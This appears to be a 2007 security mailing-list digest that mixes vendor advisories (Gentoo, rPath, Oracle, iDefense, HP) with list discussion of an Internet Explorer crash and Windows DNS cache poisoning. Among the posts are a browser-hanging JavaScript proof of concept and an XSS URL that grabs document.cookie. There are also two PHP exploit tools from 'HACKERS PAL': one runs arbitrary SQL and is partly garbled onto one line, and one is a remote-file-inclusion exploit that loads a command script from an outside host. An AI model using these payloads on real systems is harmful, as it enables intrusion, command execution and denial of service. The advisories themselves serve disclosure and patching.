Re: Internet Explorer Crash
Actually, I just get a message that says "A script on this page is causing Internet Explorer to run slowly." But my CPU usage for iexplore.exe is only at 20, and my system didn't slow down in the least. I went ahead and told IE to continue to run the script, and it pops up again in a bit asking me the same thing. Finally bored, I say no and it immediately came up with "Goodbye" on the page.

If this actually makes Safari and Konqueror crash, why the "stop using Microsoft products" recommendation? At least IE is smart enough to tell me that your little stupidInternetExploder script is being pesky.

t

----- Original Message -----
From: J. Oquendo [EMAIL PROTECTED]
To: bugtraq@securityfocus.com
Sent: Tuesday, April 17, 2007 10:09 AM
Subject: Internet Explorer Crash

Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'

I. BACKGROUND

Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION

IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash.

III. SOLUTION

Stop using Microsoft products or deal with a new advisory every other day.

IV. Proof

http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html
<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 999 99 99 99 99) z+=z;
var boum = reg.exec(z);
</script>
Goodbye

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net
http://www.infiltrated.net

"The happiness of society is the end of government." John Adams
[ GLSA 200704-14 ] FreeRADIUS: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                 Gentoo Linux Security Advisory GLSA 200704-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: FreeRADIUS: Denial of Service
      Date: April 17, 2007
      Bugs: #174292
        ID: 200704-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A memory leak has been discovered in FreeRADIUS, possibly allowing for a Denial of Service.

Background
==========

FreeRADIUS is an open source RADIUS authentication server implementation.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  net-dialup/freeradius      < 1.1.6                        >= 1.1.6

Description
===========

The Coverity Scan project has discovered a memory leak within the handling of certain malformed Diameter format values inside an EAP-TTLS tunnel.

Impact
======

A remote attacker could send a large amount of specially crafted packets to a FreeRADIUS server using EAP-TTLS authentication and exhaust all memory, possibly resulting in a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All FreeRADIUS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-dialup/freeradius-1.1.6"

References
==========

  [ 1 ] CVE-2007-2028
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2028

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Advisory: Bypass Oracle Logon Trigger
Name              Bypass Oracle Logon Trigger (7826485) [DB05]
Systems Affected  Oracle 8-10g Rel. 2
Severity          High Risk
Category          Bypass Security Feature Database Logon Trigger
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          17 April 2007 (V 1.00)

Details
#######

It is possible to bypass the Oracle database logon trigger. This can cause severe security problems. Oracle database logon triggers are often used to restrict user access (e.g. based on time or IP addresses) and/or to write audit entries into (custom) tables. This can be bypassed on unpatched systems.

This advisory is available at http://www.red-database-security.com/advisory/bypass_oracle_logon_trigger.html

Patch Information
#################

Apply the patches for Oracle CPU April 2007.

History
#######

07-jun-2006 Oracle secalert was informed
08-jun-2006 Bug confirmed
17-apr-2007 Oracle published CPU April 2007 [DB05]
17-apr-2007 Advisory published

Additional Information
######################

An analysis of the Oracle CPU April 2007 is available here:
http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html

This document will be updated during the next few days and weeks with the latest information.

(c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
Advisory: SQL Injection in package SYS.DBMS_AQADM_SYS
Name              SQL Injection in package SYS.DBMS_AQADM_SYS [DB04]
Systems Affected  Oracle 8i-10g Rel. 2
Severity          High Risk
Category          SQL Injection
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          17 April 2007 (V 1.00)

Details
#######

The package DBMS_AQADM_SYS contains SQL injection vulnerabilities.

This advisory is available at http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html

Patch Information
#################

Apply the patches for Oracle CPU April 2007.

History
#######

01-nov-2005 Oracle secalert was informed
02-nov-2005 Bug confirmed
17-apr-2007 Oracle published CPU April 2007 [DB04]
17-apr-2007 Advisory published

Additional Information
######################

An analysis of the Oracle CPU April 2007 is available here:
http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html

This document will be updated during the next few days and weeks with the latest information.

(c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
Re: Internet Explorer Crash
Nope. Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it didn't even flinch. No OOM-killing here.

On the other hand, Konqueror 3.5.5 release 45.4 churned swap madly for about five minutes (the machine continued to run well enough, if just a bit slower) until Konq sig-sixed itself.

Cheers

The Anarcat wrote:
> Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
>
> I would think that Firefox and most browsers implementing javascript would die a horrible OOM death on this.
>
> A.
>
> On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
> > [...]
Advisory: XSS Vulnerability in Oracle Secure Enterprise Search [SES01]
Name              Cross-Site-Scripting Vulnerability in Oracle Secure Enterprise Search
Systems Affected  Oracle Secure Enterprise Search 10.1.6 - SES
Severity          Medium Risk
Category          Cross Site Scripting (XSS/CSS)
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Date              17 April 2007 (V 1.00)

Details
#######

Oracle Secure Enterprise Search 10g, a standalone product from Oracle, enables a secure, high quality, easy-to-use search across all enterprise information assets.

The parameter EXPTYPE in boundary_rules.jsp contains a cross site scripting vulnerability.

This advisory is available at http://www.red-database-security.com/advisory/oracle_css_ses.html

Exploit
#######

http://ses10106:/search/admin/sources/boundary_rules.jsp?event=deleteIncludeRulep_src=webp_mode=editp_id=3pattern=rdsexpType=%3Cscript%3Ealert(document.cookie)%3C/script%3ECC_SIMPLE_INCLUSION'

Affected Products
#################

Oracle Enterprise Search

Patch Information
#################

Please upgrade to the latest version of SES or apply CPU April 2007.

History
#######

05-Apr-2005 Oracle secalert was informed
06-Apr-2005 Bug confirmed
17-apr-2007 Oracle published CPU April 2007
17-apr-2007 Red-Database-Security published this advisory

Additional Information
######################

An analysis of the Oracle CPU April 2007 is available here:
http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html

This document will be updated during the next few days and weeks with the latest information.

(c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
Advisory: Shutdown unprotected Oracle TNS Listener via Oracle Discoverer Servlet [AS01]
Name              Shutdown unprotected TNS Listener via Oracle Discoverer Servlet [AS01]
Systems Affected  Oracle Discoverer Servlet
Severity          Low Risk
Category          Remote D.o.S.
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          17 April 2007 (V 1.00)

Details
#######

The Oracle Discoverer Servlet contains a field for the database/TNS alias. It is possible to send TNS STOP commands via this field and to shut down unprotected Oracle TNS Listeners.

This advisory is available at http://www.red-database-security.com/advisory/oracle_discoverer_servlet.html

Patch Information
#################

Apply the patches for Oracle CPU April 2007.

History
#######

28-oct-2003 Oracle secalert was informed
29-oct-2003 Bug confirmed
17-apr-2007 Oracle published CPU April 2007 [AS01]
17-apr-2007 Advisory published

Additional Information
######################

An analysis of the Oracle CPU April 2007 is available here:
http://www.red-database-security.com/advisory/oracle_cpu_apr_2007.html

This document will be updated during the next few days and weeks with the latest information.

(c) 2007 by Red-Database-Security GmbH -- http://www.red-database-security.com
iDefense Security Advisory 04.17.07: McAfee VirusScan On-Access Scanner Long Unicode File Name Buffer Overflow
McAfee VirusScan On-Access Scanner Long Unicode File Name Buffer Overflow

iDefense Security Advisory 04.17.07
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 17, 2007

I. BACKGROUND

McAfee VirusScan is an AntiVirus application that offers protection against the latest computer virus threats. More information can be found on the vendor's site at the following URL.

http://www.mcafee.com/us/enterprise/products/anti_virus/file_servers_desktops/virusscan_enterprise_80i.html

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in McAfee's VirusScan Antivirus application allows attackers to disable the On-Access scanner or potentially execute arbitrary code with SYSTEM privileges.

The McAfee On-Access scanner component contains a common software flaw that leads to heap corruption when dealing with overly long file names that contain multi-byte characters. This flaw only manifests itself when the target system has East Asia language files installed and the default Unicode codepage is set to a language which contains multi-byte characters such as Chinese.

III. ANALYSIS

Exploitation allows attackers to disable the On-Access Scanner component of McAfee VirusScan or potentially execute arbitrary code with SYSTEM privileges.

In order to exploit this vulnerability, an attacker needs to be able to place a file with an overly long file name on the victim's computer. The file name would have to contain multi-byte characters such as Chinese native characters. If the On-Access scanner is enabled, simply hovering the mouse over the file to view the file properties or attempting to open the file will trigger the overflow.

Standard archive manipulation programs such as WinZip and the Windows Compressed Folder viewer cannot handle files capable of exploiting this vulnerability.

IV. DETECTION

iDefense has confirmed this vulnerability in McAfee VirusScan 8.0 Enterprise. Previous versions are suspected vulnerable as well.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

McAfee has addressed this vulnerability in Patch 12 of VirusScan Enterprise 8.0i. They recommend installing the latest available patch (Patch 15). More information is available in McAfee's Security Bulletin 612750 at the following URL.

https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=612750command=showforward=nonthreadedKC

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

02/08/2007 Initial vendor notification
02/08/2007 Initial vendor response
04/17/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Analysis of the Oracle April 2007 Critical Patch Update
Hey all,

I've just posted an analysis of the Oracle April 2007 Critical Patch Update to

http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf

(URL may line wrap)

Cheers,
David Litchfield
rPSA-2007-0072-1 lighttpd
rPath Security Advisory: 2007-0072-1
Published: 2007-04-18
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
    Remote Deterministic Denial of Service
Updated Versions:
    lighttpd=/[EMAIL PROTECTED]:devel//1/1.4.15-0.1-1

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1869
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1870
    https://issues.rpath.com/browse/RPL-1218

Description:
    Previous versions of the lighttpd package are vulnerable to two denial of service attacks. One is a remote denial of service that can cause lighttpd to consume all available CPU time and stop serving requests, and the other is a denial of service attack which generally requires a local user to create a file with an mtime of 0; the lighttpd daemon will crash when attempting to serve that file. This crash does not enable any arbitrary or directed code execution.
Reminder: HITBSecConf2007 - Malaysia: Call for Papers closing in 2 weeks
Greetings from sunny Malaysia!

This is a reminder that the Call for Papers for the upcoming HITBSecConf2007 - Malaysia is closing on the 1st of May. HITBSecConf2007 - Malaysia is set to take place from the 3rd till the 6th of September in Kuala Lumpur.

Our event last year attracted over 600 attendees from all corners of the globe and this year we are expecting this number to grow to well over 800. In addition, the event will feature 4 keynote speakers, 40 researchers, 7 tracks of hands-on technical trainings, a dual-track security conference, capture the flag competition, a lock picking village, zone-h/hitb hacking challenge, bzflag competition and one MASSIVE post conference party!!!

If you only attend ONE event this year, make sure it's HITBSecConf2007 - Malaysia, Asia's largest network security conference!
rPSA-2007-0073-1 php php-mysql php-pgsql
rPath Security Advisory: 2007-0073-1
Published: 2007-04-18
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Remote System User Deterministic Unauthorized Access
Updated Versions:
    php=/[EMAIL PROTECTED]:devel//1/4.3.11-15.10-1
    php-mysql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.10-1
    php-pgsql=/[EMAIL PROTECTED]:devel//1/4.3.11-15.10-1

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1286
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1583
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1711
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0455
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910
    https://issues.rpath.com/browse/RPL-1268

Description:
    Previous versions of the php package are vulnerable to many attacks, the worst of which enable various remote attackers to run arbitrary code as the apache user. These vulnerabilities are exposed by a wide variety of applications written in the PHP language.
[ GLSA 200704-15 ] MadWifi: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                 Gentoo Linux Security Advisory GLSA 200704-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MadWifi: Multiple vulnerabilities
      Date: April 17, 2007
      Bugs: #173434
        ID: 200704-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in the MadWifi driver, possibly leading to a Denial of Service and information disclosure.

Background
==========

The MadWifi driver provides support for Atheros based IEEE 802.11 Wireless LAN cards.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  net-wireless/madwifi-ng      < 0.9.3                      >= 0.9.3

Description
===========

The driver does not properly process Channel Switch Announcement Information Elements, allowing for an abnormal channel change. The ieee80211_input() function does not properly handle AUTH frames and the driver sends unencrypted packets before WPA authentication succeeds.

Impact
======

A remote attacker could send specially crafted AUTH frames to the vulnerable host, resulting in a Denial of Service by crashing the kernel. A remote attacker could gain access to sensitive information about network architecture by sniffing unencrypted packets. A remote attacker could also send a Channel Switch Count less than or equal to one to trigger a channel change, resulting in a communication loss and a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MadWifi users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-wireless/madwifi-ng-0.9.3"

References
==========

  [ 1 ] CVE-2007-7178
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178
  [ 2 ] CVE-2007-7179
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179
  [ 3 ] CVE-2007-7180
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
rPSA-2007-0074-1 dovecot
rPath Security Advisory: 2007-0074-1
Published: 2007-04-18
Products: rPath Linux 1
Rating: Informational
Exposure Level Classification:
    Local User Deterministic Information Exposure
Updated Versions:
    dovecot=/[EMAIL PROTECTED]:devel//1/1.0.0-0.1-1

References:
    https://issues.rpath.com/browse/RPL-1200

Description:
    Previous versions of the dovecot package are vulnerable to a trivial information exposure in which files outside the user's mail directory could be opened if the zlib plugin was used.
[ GLSA 200704-13 ] File: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                 Gentoo Linux Security Advisory GLSA 200704-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: File: Denial of Service
      Date: April 17, 2007
      Bugs: #174217
        ID: 200704-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in file allowing for a denial of service.

Background
==========

file is a utility that identifies a file format by scanning binary data for patterns.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  sys-apps/file        <= 4.20                           >= 4.20-r1

Description
===========

Conor Edberg discovered an error in the way file processes a specific regular expression.

Impact
======

A remote attacker could entice a user to open a specially crafted file, using excessive CPU resources and possibly leading to a Denial of Service. Note that this vulnerability could also be triggered through an automatic file scanner like amavisd-new.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All file users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=sys-apps/file-4.20-r1"

References
==========

  [ 1 ] CVE-2007-2026
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2026

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
MediaBeez Sql query Execution .. Wear isn't ?? :)
Hello,, Media Beez Sql query execution :) Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [EMAIL PROTECTED] Sql Execution Exploit .. ?php /***/ /* MediaBeez Sql Query Execution */ /* By : HACKERS PAL [EMAIL PROTECTED] */ /*Website : WwW.SoQoR.NeT */ /***/ error_reporting(0); ini_set(max_execution_time,0); Function get_page($url){if(function_exists(file_get_contents)){$contents=file_get_contents($url);}else{$fp=fopen($url,r);while($line=fread($fp,1024)){$contents=$contents.$line;}}return$contents;} Echo body bgcolor=\#00\ text=\#00FF00\\ntitleMediaBeez Sql query Execution by : HACKERS PAL :: WwW.SoQoR.NeT ::/title\n\r.h2MediaBeez Sql Query Execution\n\r.h3By : HACKERS PAL [EMAIL PROTECTED].h3VisiT My Website [a href=\http://WwW.SoQoR.NeT\;WwW.SoQoR.NeT/a]\n\r; $expl=base64_decode(L3BocC9hZG9kYi9zZXJ2ZXIucGhwP3NxbD17MX0vKg==); $action=$_GET['action']; if($action == ) { echo form action=\$PHP_SELF?action=2\ method=\post\\n Web URL -- Example : http://localhost/mediabeez\n br input type=\text\ name=\url\ style=\width:250\\n br br\n Sql Query br textarea name=\query\ cols=\70\ rows=\5\/textarea\n br\n br div align=\center\\n input type=\submit\ /div\n /form\n ; } else { $exploit=$_POST['url'].str_replace('{1}',''.$_POST['query'].'',str_replace( ,,$expl)); if(!eregi(error,get_page($exploit))) { Echo h1 Query Successfully executed/h1br Thanks For Using This exploit .. 
Have Fun :)brbrbr; } } die(base64_decode(...));
Re: Internet Explorer Crash
Actually yes, the PoC crashes my IE, makes it hang, and my CPU usage goes to 100%, and I'm using Internet Explorer 7.0.5730.11 like he said.

Tom

Thor (Hammer of God) wrote:
> [...]
Re: [Full-disclosure] A Botted Fortune 500 a Day
Steven Adair wrote:

> Is this in any way surprising?
> ...
> Surprising? Not really.
> ...
> I think we all know the answer is no. Many Fortune 500 companies have more employees than some ISPs have customers.

And that means the corporates should be expected to be (as) botted?

> Should we really expect differently?

Indeed we should.

It's easy to compare numbers, but that's not the real story. Almost by definition an ISP has no administrative control of the computers its customers use to connect via its service. Corporates are totally different in this regard -- in fact, diametrically opposite. Corporates own and thus are responsible for the control of all the computers they attach to their LANs and should be responsible for the actions of all those machines.

So, in answer to your question, yes, we definitely should expect more -- a great deal more. Will they be perfect? Sadly, no; partly because of human fallibility and partly because too many of them take what seems to be your view -- controlling all this is a hopeless task so why even bother trying.

And finally, I don't think SI's efforts show that any F500s are as bad as a typical ISP. SI is, however, showing that at least some F500s have lazy arse/stupid/otherwise incompetent admins and/or oversight procedures and/or policies driving the whole mess of their IT systems, and as a result the rest of us pay for their incompetence.

> Also, as a side note, I would like to add that just because SPAM is coming from a certain gateway does not necessarily mean that the machines on their network are infected.
> ...

Did you read any of their reports fully?

They don't assume that. They track the mail back behind the gateways and they know what forms of what spam are being sent through bot-nets because of other systems they run (honeypots, etc) and analysis they perform.

> ...
> We could assume this, but then again I would have to assume Microsoft's network is full of bots because I get SPAM originating from Hotmail.com. It might be logical and in many cases to assume this, but it's worth noting this may not be the case.

And they made an obvious (or much more subtle) error like this where?

Regards,

Nick FitzGerald
Extreme PHPBB2 Remote File Inclusion
Hello,,

EclipseBB Remote File Inclusion .. With exploit :)

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [EMAIL PROTECTED]

Tested on 3.0 Pre Final
And other Versions Should be infected

/* Script info
## Mod Title: Extreme PHPBB 3.0
## Mod Version: 3.0 Pre Final
## Author: danb00 (Demo: http://extremephpbb.com/forum)
## Description: A fully modded phpBB 2.0.11
*/

Remote File include :-

includes/functions.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt?
includes/functions_portal.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt?

Exploit:

<?php
/***/
/* Extreme PHPBB2 Command Execution Exploit */
/* By : HACKERS PAL [EMAIL PROTECTED] */
/* Website : WwW.SoQoR.NeT */
/***/
error_reporting(0);
ini_set("max_execution_time", 0);
function get_page($url) {
    if (function_exists("file_get_contents")) {
        $contents = file_get_contents($url);
    } else {
        $fp = fopen($url, "r");
        while ($line = fread($fp, 1024)) {
            $contents = $contents . $line;
        }
    }
    return $contents;
}
echo "<body bgcolor=\"#00\" text=\"#00FF00\">\n<title>Extreme PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::</title>\n\r"
   . "<h2>Extreme PHPBB2 Command Execution</h2>\n\r"
   . "<h3>By : HACKERS PAL [EMAIL PROTECTED]</h3>"
   . "<h3>VisiT My Website [<a href=\"http://WwW.SoQoR.NeT\">WwW.SoQoR.NeT</a>]</h3>\n\r";
$expl = base64_decode("aW5jbHVkZXMvZnVuY3Rpb25zLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=");
$action = $_GET['action'];
if ($action == "") {
    echo "<form action=\"$PHP_SELF?action=2\" method=\"post\">\n"
       . "Web URL -- Example : http://localhost/Extreme\n<br>"
       . "<input type=\"text\" name=\"url\" style=\"width:250\">\n<br><br>\n"
       . "Command : <br><textarea name=\"query\" cols=\"70\" rows=\"5\"></textarea>\n<br>\n<br>"
       . "<div align=\"center\">\n<input type=\"submit\"></div>\n</form>\n";
} else {
    $exploit = $_POST['url'] . "/" . $expl . "cmd=" . $_POST['query'];
    $page = get_page($exploit);
    if (!eregi("hacking attempt", $page)) {
        echo "<h1>Command Successfully executed .. Result is</h1> $page <br> Thanks For Using This exploit .. Have Fun :)<br><br><br>";
    }
}
die(base64_decode("..."));  // base64-encoded HTML footer omitted (not reproduced here)
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
> I appreciate you replying, but I understand the Windows DNS attack well. I'm just wondering how and if BIND protects against the same attack, and if yes, how?

Well, as the main vulnerability implies, a sane DNS cache wouldn't accept a record that wasn't requested. If I ask for A, and I get A and B back, and B isn't reasonably related to A, ignore B.

I'm not saying BIND is sane, but from what I understand, in this case they got it right. The birthday attack is merely another vector to exploit the real problem.

tim
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
Hi Roger,

On 4/18/07, Roger A. Grimes [EMAIL PROTECTED] wrote:
> How does BIND stop this sort of attack?
> Can a BIND expert respond?

I'm not a BIND expert but I can (hopefully) tell you what's happening.

Basically, Windows 2000 SP3 automatically accepts all authority RRs (authoritative name servers) that are received in a DNS reply. So, if you have a DNS server running on Windows 2000 SP3 which is available from the Internet, and which supports recursive requests, all an attacker has to do is to issue a DNS request to your server for a domain (and a DNS server) that he controls. The attacker's DNS server can add several authority RRs (they define authoritative nameservers) for TLDs, such as .com or .net, and will effectively pollute your DNS cache.

This can be fixed by applying SP4 or changing a registry item. However, it was later found that Windows 2000 DNS servers were still vulnerable if they were configured to forward DNS requests to another DNS server. So, the typical setup in most organizations is:

Windows DNS -> forwarding to BIND

If you have BIND v9, it will retrieve the reply but will not strip out authority RRs. BIND will send this back to the Windows DNS server, which will happily cache everything, trusting BIND. In BIND v9 this was fixed because it will delete this (extra) data before sending the reply back to the Windows DNS server (that's why it's very important to upgrade your DNS servers to BIND v9).

I'm not sure what's the story with other DNS servers (djbdns, for example).

Cheers,
Bojan
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
Hello Makoto,

> Thank you for the clarification, Tim. That is exactly what I wanted to say. :)
>
> By the way, as regards recent Bind 9, the birthday attack is much more difficult to conduct because even if the attacker sends multiple simultaneous recursive queries, Bind 9 aggregates these queries.

Aggregating queries would definitely help if you assume the attacker can make recursive queries. However, it was my understanding (which could be completely wrong) that BIND 9 reuses sockets for multiple queries, unlike previous versions, and this makes spoofed attacks easier in another respect. (Of course this all has nothing to do with the Windows-specific flaw.)

> In addition, there is a patch written by Jinmei-san for Bind 9.4.0 (current release) to randomize source ports.
> http://www.jinmei.org/bind-9.4.0-portpool.patch
> http://member.wide.ad.jp/tr/wide-tr-dns-bind9-portpool-01.txt (technical report from WIDE project in Japanese)

That's good, that at least someone is trying to do this in BIND.

thanks for the info,
tim
Re: Linksys WAG200G - Information disclosure
A new 1.01.04 firmware for the Linksys WAG200G seems to correct this security problem.

Firmware 1.01.04 (04/04/2007) :
- Fixes issue with incorrect upstream/downstream transmit power display on DSL Connection page
- Fixes issue with ATT VPN client not connecting to ATT VPN network
- Fixes issue with Security information disclosure for UDP port scan packet
Re: Internet Explorer Crash
Yeah, it hung my Internet Explorer window, but right clicking on the task bar and clicking Close took care of it. No biggy.
[security bulletin] HPSBST02206 SSRT071354 rev.2 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS07-017
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00965724
Version: 2

HPSBST02206 SSRT071354 rev.2 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS07-017

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2007-04-10
Last Updated: 2007-04-17

Potential Security Impact: Please check the table below

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA; please check the table in the Resolution section of this Security Bulletin.

References: MS07-017

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Storage Management Appliance v2.1 Software running on:
* Storage Management Appliance I
* Storage Management Appliance II
* Storage Management Appliance III

BACKGROUND
For a PGP signed version of this security bulletin please write to: [EMAIL PROTECTED]

Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins.

For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site: http://www.itrc.hp.com/service/cki/secBullArchive.do
* For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146
* For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147
* For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148
* For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140

The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site: http://www.microsoft.com/technet/security/bulletin/summary.mspx

NOTE: The SMA must have all pertinent SMA Service Packs applied.

Windows 2000 Update Rollup 1
